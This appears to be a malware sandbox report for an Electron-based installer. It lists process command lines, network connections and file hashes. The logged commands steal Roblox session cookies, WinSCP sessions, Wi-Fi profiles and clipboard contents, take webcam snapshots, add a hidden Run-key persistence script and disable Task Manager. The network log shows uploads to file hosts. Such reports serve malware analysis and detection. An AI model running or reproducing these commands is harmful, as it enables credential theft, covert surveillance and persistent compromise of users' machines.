C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\CuLes3pYjWqr_temp.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\mrfjAliugCUQKkh5baSi\System\cam.3440_Admin.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {netsh wlan show profile}"

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\CuLes3pYjWqr_temp.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\mrfjAliugCUQKkh5baSi\System\cam.3440_Admin"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_x9SxPW /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_x9SxPW.vbs /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_x9SxPW.vbs\""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_x9SxPW /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_x9SxPW.vbs /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_x9SxPW.vbs\"""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_x9SxPW.vbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutKWb3k.ps1" -RunAsAdministrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutKWb3k.ps1" -RunAsAdministrator"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

"C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1204 --field-trial-handle=1700,15986905126159184494,2064785458810304812,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 6.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 store7.gofile.io udp
US 136.175.9.9:443 store7.gofile.io tcp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 9.9.175.136.in-addr.arpa udp
US 8.8.8.8:53 hawkish.eu udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
FR 163.5.121.96:443 hawkish.eu tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 140.82.121.3:443 github.com tcp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 store8.gofile.io udp
FR 163.5.121.96:443 hawkish.eu tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 96.121.5.163.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 31.191.168.206.in-addr.arpa udp
FR 163.5.121.96:443 hawkish.eu tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\d3dcompiler_47.dll

MD5 0d4e6bbcf64ff43d2e82c0d7fd0a7da4
SHA1 f9aab0cee1d3eee00d30150d214a41181f7d96c2
SHA256 13d3dbfe37df8368134feb2dc63cd65e81c005f9e0d673282e3ec690163c3203
SHA512 4acd5b330e3c6114b283e4cfe32c89e26a8461c57cddc8c95635576118c65e03f714609f9f9f54f6e0db07ba4942539736c12738353aace11c871cc15d93a663

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\icudtl.dat

MD5 d7271ef694fb77e3a4be6e1af43e1072
SHA1 6b36d522bb91913c68ff773d8115df6a3715ab66
SHA256 dba30fc0859de4b7095412805e93ebf13113c9e08910e808fe2e2e8860ae5ba2
SHA512 a04a5fcc9a65c9bc1eabbaf61afa3caa506f2aab124b5e2c9e5493413b78d93475582eaaf5baae963c7e3d8cf5f76ef1cdf0d7b95747aa81601a2fede207c440

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\ffmpeg.dll

MD5 426e89b5c8c12512cb76768a8de5298b
SHA1 cad5c7526214add01425761f83e1e15cdbd1dcc7
SHA256 8d1466e1f817d511a728245fa7d2e5bc6c10066ed56a0113ab636a846866f9e3
SHA512 7873d3745426d8dbd449868d7b588348f5e822efe0a2a46d35fb5a9420204601a3160e48208fbd5672543c2fcc3939ece6f0ec7b2e4b99323ab50b7074671cd0

C:\Users\Admin\AppData\Local\Temp\nsd8166.tmp\7z-out\libGLESv2.dll

MD5 aa5fe1e4c3b39a85a7bdc5dbf6a3544b
SHA1 fcf4b9fb75e00f2a3a02436ae04b47f49f03fc8b
SHA256 32d3f26319ddecce449cba010a26c579a27ad306fa0aae16dcb300831b2719a6
